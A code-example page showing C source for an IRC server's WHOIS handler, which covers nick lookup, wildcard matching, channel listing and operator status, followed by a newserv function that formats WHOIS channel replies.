  char *nick_match=NULL, *user_match=NULL, *host_match=NULL, *server_match=NULL;
  char *name_match=NULL;
  int found_mode;
  int hits = 0;
  char *mename = me.name;

  if(sptr->user && sptr->user->vlink)
    mename = sptr->user->vlink->name;
  
  if (parc < 2)
    {
      sendto_one(sptr, form_str(ERR_NONICKNAMEGIVEN),
                 mename, parv[0]);
      return 0;
    }

  if(parc > 2)
    {
      if (hunt_server(cptr,sptr,":%s WHOIS %s :%s", 1,parc,parv) !=
          HUNTED_ISME)
        return 0;
      parv[1] = parv[2];
    }

  if(!IsAnOper(sptr) && !MyConnect(sptr)) /* pace non local requests */
    {
      if((last_used + WHOIS_WAIT) > CurrentTime)
        {
          /* Unfortunately, returning anything to a non local
           * request =might= increase sendq to be usable in a split hack
           * Sorry gang ;-( - Dianora
           */
          return 0;
        }
      else
        {
          last_used = CurrentTime;
        }
    }

  /* Multiple whois from remote hosts, can be used
   * to flood a server off. One could argue that multiple whois on
   * local server could remain. Lets think about that, for now
   * removing it totally. 
   * -Dianora 
   */

  /*  for (tmp = parv[1]; (nick = strtoken(&p, tmp, ",")); tmp = NULL) */
  nick = parv[1];
  p = strchr(parv[1],',');
  if(p)
    *p = '\0';

    {
      int       invis, member, wilds;
      found = 0;
      (void)collapse(nick);
      wilds = (nick[0]=='$' || strchr(nick, '?') || strchr(nick, '*'));
      /*
      ** We're no longer allowing remote users to generate
      ** requests with wildcards.
      */
      if (wilds && !IsAnOper(sptr))
        {
          sendto_one(sptr, form_str(ERR_NOSUCHNICK),
                     mename, parv[0], nick);
          return 0;
        }
      /*        continue; */

      /* If the nick doesn't have any wild cards in it,
       * then just pick it up from the hash table
       * - Dianora 
       */

      if(!wilds)
        {
          acptr = hash_find_client(nick,(struct Client *)NULL);
          if(!acptr)
            {
              sendto_one(sptr, form_str(ERR_NOSUCHNICK),
                         mename, parv[0], nick);

              sendto_one(sptr, form_str(RPL_ENDOFWHOIS),
                         mename, parv[0], parv[1]);
						 
              return 0;
              /*              continue; */
            }
          if(IsStealth(acptr)) { 
	    sendto_one(sptr, form_str(ERR_NOSUCHNICK), mename,
	     parv[0], nick);
	     return 0; // Add by ^Stinger^ after the idea of Soldier (:
	  } 
	  if(!IsPerson(acptr))
            {
              sendto_one(sptr, form_str(RPL_ENDOFWHOIS),
                         mename, parv[0], parv[1]);
              return 0;
            }
            /*      continue; */

          user = acptr->user ? acptr->user : &UnknownUser;
          name = (!*acptr->name) ? "?" : acptr->name;
          invis = IsInvisible(acptr);
          member = (user->channel) ? 1 : 0;

          a2cptr = find_server(user->server);
          
          sendto_one(sptr, form_str(RPL_WHOISUSER), mename,
        	    parv[0], name, acptr->username, acptr->host, acptr->info);

	  if((IsOper(sptr) || (acptr == sptr)) && WhoisExtension)
	  {
		sendto_one(sptr, form_str(RPL_WHOISREALHOST), mename,
		    parv[0], name, acptr->realhost);
	  }

          mlen = strlen(mename) + strlen(parv[0]) + 6 +
            strlen(name);
			
          *buf = '\0';			
          if (IsSsl(acptr))
          {
              sendto_one(sptr, form_str(RPL_WHOISSECURE), mename, parv[0], parv[1]);
          }

		  if(((!IsPrivate(acptr) || IsOper(sptr)) || (acptr==sptr))
		  && !IsStealth(acptr))
          for (len = 0, *buf = '\0', lp = user->channel; lp;
               lp = lp->next)
            {
              chptr = lp->value.chptr;
              if (ShowChannel(sptr, chptr))
                {
                  if (len + strlen(chptr->chname)
                      > (size_t) BUFSIZE - 4 - mlen)
                    {
                      sendto_one(sptr,
                                 ":%s %d %s %s :%s",
                                 mename,
                                 RPL_WHOISCHANNELS,
                                 parv[0], name, buf);
                      *buf = '\0';
                      len = 0;
                    }

		  found_mode = user_channel_mode(acptr, chptr);
#ifdef HIDE_OPS
		  if(is_chan_op(sptr,chptr))
#endif
		    {
		      if(found_mode & CHFL_CHANOP)
			*(buf + len++) = '@';
#ifdef HALFOPS
                     else if (found_mode & CHFL_HALFOP)
                       *(buf + len++) = '%';
#endif
		      else if (found_mode & CHFL_VOICE)
			*(buf + len++) = '+';
		    }
                  if (len)
                    *(buf + len) = '\0';
                  (void)strcpy(buf + len, chptr->chname);
                  len += strlen(chptr->chname);
                  (void)strcat(buf + len, " ");
                  len++;
                }
            }
          if (buf[0] != '\0')
            sendto_one(sptr, form_str(RPL_WHOISCHANNELS),
                       mename, parv[0], name, buf);
          if(IsAnOper(sptr) || !HideServerOnWhois)
            {
#ifdef SERVERHIDE
            if (!(IsAnOper(sptr) || acptr == sptr))
              sendto_one(sptr, form_str(RPL_WHOISSERVER),
                       mename, parv[0], name, NetworkName,
                       NetworkDesc);
            else
#endif
            if(acptr->user && acptr->user->vlink)
              sendto_one(sptr, form_str(RPL_WHOISSERVER),
                     mename, parv[0], name, user->vlink->name,
                     user->vlink->passwd);
            else
              {
                if(!IsService(acptr) || IsAnOper(sptr) || !HideServicesServer)
                sendto_one(sptr, form_str(RPL_WHOISSERVER),
                     mename, parv[0], name, user->server,
                     a2cptr?a2cptr->info:"*Not On This Net*");
              }
	    } /* if(IsAnOper(sptr) || HideServerOnWhois) */
	  if (IsIdentified(acptr))
            sendto_one(sptr, form_str(RPL_WHOISIDENTIFIED),
                       mename, parv[0], name);

          if (IsHelper(acptr))
        	sendto_one(sptr, form_str(RPL_WHOISHELPOP),
                           mename, parv[0], name);
					   
          if(IsOper(sptr) && WhoisExtension)
	  {
	    sendto_one(sptr, form_str(RPL_WHOISMODE),
		mename, parv[0], name, get_mode_string(acptr));
	  }
	  
	  if (user->away)
            sendto_one(sptr, form_str(RPL_AWAY), mename,
                       parv[0], name, user->away);
	if(!IsHideOper(acptr) || IsOper(sptr))
	  {	
	    if (IsNetAdmin(acptr))
              sendto_one(sptr, form_str(RPL_WHOISOPERATOR),   
                      mename, parv[0], name, rpl_nadmin);
	    else if (IsTechAdmin(acptr))
              sendto_one(sptr, form_str(RPL_WHOISOPERATOR),   
                      mename, parv[0], name, rpl_tadmin);						   
            else if (IsSAdmin(acptr))
              sendto_one(sptr, form_str(RPL_WHOISOPERATOR),   
                      mename, parv[0], name, rpl_sadmin);						   
            else if (IsAdmin(acptr))
              sendto_one(sptr, form_str(RPL_WHOISOPERATOR),  
                      mename, parv[0], name, rpl_admin);
            else if (IsOper(acptr))
              sendto_one(sptr, form_str(RPL_WHOISOPERATOR), 
            	mename, parv[0], name, rpl_oper);
            else if (IsLocOp(acptr))
              sendto_one(sptr, form_str(RPL_WHOISOPERATOR),
            	mename, parv[0], name, rpl_locop);
	  }
#ifdef WHOIS_NOTICE
          if ((IsOper(acptr)) && ((acptr)->umodes & UMODE_SPY) &&
              (MyConnect(sptr)) && (IsPerson(sptr)) && (acptr != sptr) && !is_silenced(sptr, acptr))
            sendto_one(acptr,
                       ":%s NOTICE %s :*** Notice -- %s (%s@%s) is doing a /whois on you.",
                       me.name, acptr->name, parv[0], sptr->username,
                       sptr->realhost);
#endif /* #ifdef WHOIS_NOTICE */


          if ((acptr->user
#ifdef SERVERHIDE
              && IsAnOper(sptr)
#endif
              && MyConnect(acptr)))
            sendto_one(sptr, form_str(RPL_WHOISIDLE),
                       mename, parv[0], name,
                       CurrentTime - user->last,
                       acptr->firsttime);
					   
          sendto_one(sptr, form_str(RPL_ENDOFWHOIS), mename, parv[0], parv[1]);
          
          return 0;
          /*      continue; */
        }

      /* wild is true so here we go */
          if(nick[0]==':') /* real name match */
            {
              name_match =  &nick[1];
              nick_match = NULL;
            }
          else
	  if(nick[0]=='$') /* server name match */
	    {
	      server_match = &nick[1];
	      nick_match = NULL;
	    }
	  else
		{
		  host_match = strchr(nick,'@');
		  if(host_match)
			{
			  if(*host_match)
				*(host_match++) = '\0';						  
			  user_match=nick;		  		  
			  if(host_match=='\0')
				host_match="*";		  			
			  if(user_match=='\0')
			  user_match="*";		  
			}
		  else
			nick_match = nick;
		}
		
	  				
      for (acptr = GlobalClientList; acptr;
           acptr = acptr->next)
        {
          if (IsServer(acptr))
            continue;
          /*
           * I'm always last :-) and acptr->next == NULL!!
           */
          if (IsMe(acptr))
            break;
          /*
           * 'Rules' established for sending a WHOIS reply:
           *
           *
           * - if wildcards are being used dont send a reply if
           *   the querier isnt any common channels and the
           *   client in question is invisible and wildcards are
           *   in use (allow exact matches only);
           *
           * - only send replies about common or public channels
           *   the target user(s) are on;
           */

/* If its an unregistered client, ignore it, it can
   be "seen" on a /trace anyway  -Dianora */

          if(!IsRegistered(acptr))
            continue;

          user = acptr->user ? acptr->user : &UnknownUser;
          name = (!*acptr->name) ? "?" : acptr->name;
		  
		  if(  (server_match && !match(server_match, user->server))
		    || (nick_match && !match(nick, name)) 
			|| (host_match && !match(host_match, acptr->realhost)
			   && !match(host_match, acptr->host))
			|| (user_match && !match(user_match, acptr->username))
			|| (name_match &&  !match(name_match, acptr->info))
			)
        	  continue;
			  
		  ++hits;
			  
          a2cptr = find_server(user->server);
          
          sendto_one(sptr, form_str(RPL_WHOISUSER), mename,
                    parv[0], name,
                    acptr->username, 
					IsOper(sptr) ? acptr->realhost : acptr->host,					 
					acptr->info);
					
          found = 1;
          mlen = strlen(mename) + strlen(parv[0]) + 6 +
            strlen(name);
          for (len = 0, *buf = '\0', lp = user->channel; lp;
               lp = lp->next)
            {
              chptr = lp->value.chptr;
              if (ShowChannel(sptr, chptr))
                {
                  if (len + strlen(chptr->chname)
                      > (size_t) BUFSIZE - 4 - mlen)
                    {
                      sendto_one(sptr,
                                 ":%s %d %s %s :%s",
                                 mename,
                                 RPL_WHOISCHANNELS,
                                 parv[0], name, buf);
                      *buf = '\0';
                      len = 0;
                    }
		  found_mode = user_channel_mode(acptr, chptr);
#ifdef HIDE_OPS
                  if(is_chan_op(sptr,chptr))
#endif
		     {
		       if (found_mode & CHFL_CHANOP)
			 *(buf + len++) = '@';
#ifdef HALFOPS
                     else if (found_mode & CHFL_HALFOP)
                        *(buf + len++) = '%';
#endif                                            
		       else if (found_mode & CHFL_VOICE)
			 *(buf + len++) = '+';
		     }
                  if (len)
                    *(buf + len) = '\0';
                  (void)strcpy(buf + len, chptr->chname);
                  len += strlen(chptr->chname);
                  (void)strcat(buf + len, " ");
                  len++;
                }
            }
          if (buf[0] != '\0')
            sendto_one(sptr, form_str(RPL_WHOISCHANNELS),
                       mename, parv[0], name, buf);
         
#ifdef SERVERHIDE
          if (!(IsAnOper(sptr) || acptr == sptr))
            sendto_one(sptr, form_str(RPL_WHOISSERVER),
                       mename, parv[0], name, NetworkName,
                       NetworkDesc);
          else    
#endif
          sendto_one(sptr, form_str(RPL_WHOISSERVER),
                     mename, parv[0], name, user->server,
                     a2cptr?a2cptr->info:"*Not On This Net*");

          if (user->away)
            sendto_one(sptr, form_str(RPL_AWAY), mename,
                       parv[0], name, user->away);



  		  if (IsNetAdmin(acptr))
                sendto_one(sptr, form_str(RPL_WHOISOPERATOR),   
                           mename, parv[0], name, rpl_nadmin);
		  else if (IsTechAdmin(acptr))
                sendto_one(sptr, form_str(RPL_WHOISOPERATOR),   
                           mename, parv[0], name, rpl_tadmin);						   
          else if (IsSAdmin(acptr))
                sendto_one(sptr, form_str(RPL_WHOISOPERATOR),   
                           mename, parv[0], name, rpl_sadmin);						   
          else if (IsAdmin(acptr))
                sendto_one(sptr, form_str(RPL_WHOISOPERATOR),  
                           mename, parv[0], name, rpl_admin);
          else if (IsAnOper(acptr))
                sendto_one(sptr, form_str(RPL_WHOISOPERATOR), 
                           mename, parv[0], name, rpl_oper);


#ifdef WHOIS_NOTICE
          if ((MyOper(acptr)) && ((acptr)->umodes & UMODE_SPY) &&
              (MyConnect(sptr)) && (IsPerson(sptr)) && (acptr != sptr))
            sendto_one(acptr,
                       ":%s NOTICE %s :*** Notice -- %s (%s@%s) is doing a /whois on you.",
                       mename, acptr->name, parv[0], sptr->username,
                       sptr->realhost);
#endif /* #ifdef WHOIS_NOTICE */

          if ((acptr->user
#ifdef SERVERHIDE
              && IsAnOper(sptr) 
#endif                 
              && MyConnect(acptr)))
            sendto_one(sptr, form_str(RPL_WHOISIDLE),
                       mename, parv[0], name,
                       CurrentTime - user->last,
                       acptr->firsttime);

		if(hits>50)
		  {
  			sendto_one(sptr,":%s NOTICE %s :Aborting /whois output as flood prevention",
				mename, sptr->name);			  
			break;
		  }
        }
		
      if (!found)	  
        sendto_one(sptr, form_str(ERR_NOSUCHNICK),
                   mename, parv[0], nick);
	  else
		sendto_one(sptr,":%s NOTICE %s :This /whois matched \2%i\2 user(s)", 
			mename, sptr->name,hits);
      /*
      if (p)
        p[-1] = ',';
        */
    }

  sendto_one(sptr, form_str(RPL_ENDOFWHOIS), mename, parv[0], parv[1]);
  
  return 0;
}

示例#12

0

显示文件

文件： channelhandlers.c 项目： quakenet/newserv

void handlewhoischannels(int hooknum, void *arg) {
  channel **chans;
  char buffer[1024];
  unsigned int bufpos;
  sstring *name;
  unsigned long *num;
  int i;
  char **args = (char **)arg;
  nick *sender = (nick *)args[0]; /* sender nick */
  nick *target = (nick *)args[1]; /* target nick */
  char *sourcenum = args[2];      /* source numeric */

  /* do not show channels for +k service clients or IRC Operators
   * do not show channels for +n users
   * unless they whois themselves
   */
  if ((IsService(target) || IsHideChan(target)) && sender != target)
    return;

  chans = (channel **)(target->channels->content);

  buffer[0] = '\0';
  bufpos=0;
  
  /* Not handling delayed joins. */
  for(i=target->channels->cursi-1;i>=0;i--) {
    /* Secret / Private channels: only show if the sender is on the channel as well */
    if(IsSecret(chans[i]) || IsPrivate(chans[i])) {
      if (!getnumerichandlefromchanhash(chans[i]->users, sender->numeric))
        continue;
    }

    name = chans[i]->index->name;
    if (bufpos + name->length > 508) { /* why 508? - need room for -@#channame\0 + 1 slack */
      irc_send("%s", buffer);
      buffer[0] = '\0';
      bufpos=0;
    }

    /*
     * 319 RPL_WHOISCHANNELS "source 319 target nick :channels"
     *                       "irc.netsplit.net 319 foobar barfoo :@#chan1 +#chan2 #chan3"
     *                       "irc.netsplit.net 319 foobar barfoo :-@#chan1 -+#chan2 -#chan3"
     */
    if(buffer[0] == '\0')
      bufpos=snprintf(buffer, sizeof(buffer), "%s 319 %s %s :", getmynumeric(), sourcenum, target->nick);

    num = getnumerichandlefromchanhash(chans[i]->users, target->numeric);

    /* Adding these flags might make the string "unsafe" (without terminating \0). */
    /* sprintf'ing the channel name afterwards is guaranteed to fix it though */
    if (IsDeaf(target))
      buffer[bufpos++]='-';
    if (*num & CUMODE_OP)
      buffer[bufpos++]='@';
    else if (*num & CUMODE_VOICE)
      buffer[bufpos++]='+';

    bufpos += sprintf(buffer+bufpos, "%s ",name->content);
  }

  if (buffer[0] != '\0')
    irc_send("%s", buffer);
}